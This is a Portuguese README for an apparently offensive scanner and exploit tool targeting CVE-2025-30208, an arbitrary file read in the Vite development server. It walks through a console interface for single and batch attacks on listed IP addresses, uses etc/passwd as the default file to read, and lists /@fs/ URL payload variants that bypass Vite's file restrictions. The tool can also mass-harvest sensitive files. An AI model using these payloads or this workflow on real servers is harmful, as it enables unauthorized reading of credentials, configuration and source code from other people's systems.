
CVE‑2025‑30208 é uma vulnerabilidade de leitura arbitrária de arquivos de gravidade média no servidor de desenvolvimento Vite (uma popular ferramenta de construção frontend).
Scanner de vulnerabilidade avançado para CVE-2025-30208 com recursos de nível empresarial
Ferramenta profissional de teste de penetração para detecção de leitura arbitrária de arquivos no Vite
🚀 Início Rápido • 📋 Funcionalidades • 🔧 Uso • 📊 Exemplos • 🛡️ Segurança
Este é um scanner de vulnerabilidade abrangente projetado para detectar e explorar a vulnerabilidade CVE-2025-30208 em servidores de desenvolvimento Vite. A vulnerabilidade permite acesso de leitura arbitrária de arquivos através dos endpoints do sistema de arquivos do Vite, potencialmente expondo arquivos de configuração sensíveis, código-fonte e informações do sistema.
A ferramenta agora possui uma arquitetura modular para melhor manutenibilidade e extensibilidade:
CVE-2025-30208.py - Aplicação principal do scannerpayloads.py - Payloads de exploração avançados (mais de 60 variações)sensitive_files.py - Banco de dados abrangente de arquivos sensíveis (mais de 200 arquivos)html_template.py - Template aprimorado de relatórios HTML estilo hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Ativar modo verbose para saída detalhada
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Pressione Enter duas vezes para finalizar]
CVE-2025-30208 > scan
# Configurar proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Definir cabeçalhos personalizados
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configurar limitação de taxa
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Gerar relatório HTML bonito
CVE-2025-30208 > pull
# Iniciar servidor web para visualizar o relatório
CVE-2025-30208 > web
# Iniciar servidor web em porta específica
CVE-2025-30208 > web 8081
# Parar servidor web
CVE-2025-30208 > web off
| Comando | Descrição | Exemplo |
|---|---|---|
set <opção> <valor> | Definir opções de configuração | set RHOST 192.168.1.100 |
show options | Exibir configurações atuais | show options |
edit | Editor interativo de opções | edit |
run / exploit | Executar teste de vulnerabilidade | run |
batch | Varredura em lote de múltiplos alvos | batch |
scan | Descobrir arquivos sensíveis | scan |
pull | Exportar resultados para HTML/JSON | pull |
web [on|off|port] | Servidor web para relatórios HTML | web 8080 |
save | Salvar configuração da sessão | save |
load | Carregar configuração da sessão | load |
test | Testar conectividade com o alvo | test |
validate | Validar configuração atual | validate |
verbose | Alternar modo verbose | verbose |
proxy | Configurar configurações de proxy | proxy |
headers | Definir cabeçalhos HTTP personalizados | headers |
rate | Configurar limitação de taxa | rate |
log | Mostrar informações de registro | log |
help / ? | Mostrar ajuda | help |
exit / quit | Sair da ferramenta | exit |
| Opção | Descrição | Padrão | Validação |
|---|---|---|---|
RHOST | Host/IP alvo | - | Validação de hostname/IP |
RPORT | Porta alvo | - | Faixa de portas (1-65535) |
FILEPATH | Caminho do arquivo para teste | etc/passwd | Validação de caminho |
PROXY | URL do proxy HTTP/HTTPS | - | Validação de formato de URL |
VERBOSE | Ativar saída verbose | false | Validação booleana |
RATE_LIMIT | Atraso entre requisições (segundos) | 0.3 | Validação numérica |
THREADS | Número de threads para varredura em lote | 5 | Validação de inteiro |
TIMEOUT | Tempo limite de requisição (segundos) | 5 | Validação de inteiro |
CUSTOM_HEADERS | Cabeçalhos HTTP personalizados (JSON) | {} | Validação de formato JSON |
O scanner agora usa mais de 60 variações diferentes de payload organizadas em payloads.py:
/@fs/{caminho_arquivo}?raw??
/@fs/{caminho_arquivo}?raw&url
/@fs/{caminho_arquivo}?import&raw??
/@fs/{caminho_arquivo}?raw&import
/@fs/{caminho_arquivo}?import&url
/@fs/{caminho_arquivo}?raw&source
/@fs/{caminho_arquivo}?raw&content
/@fs/{caminho_arquivo}?raw&data
/@fs/{caminho_arquivo}?raw&file
/@fs/{caminho_arquivo}?raw&type=text
/@fs/{caminho_arquivo}?raw&format=text
/@fs/{caminho_arquivo}?raw&encoding=utf8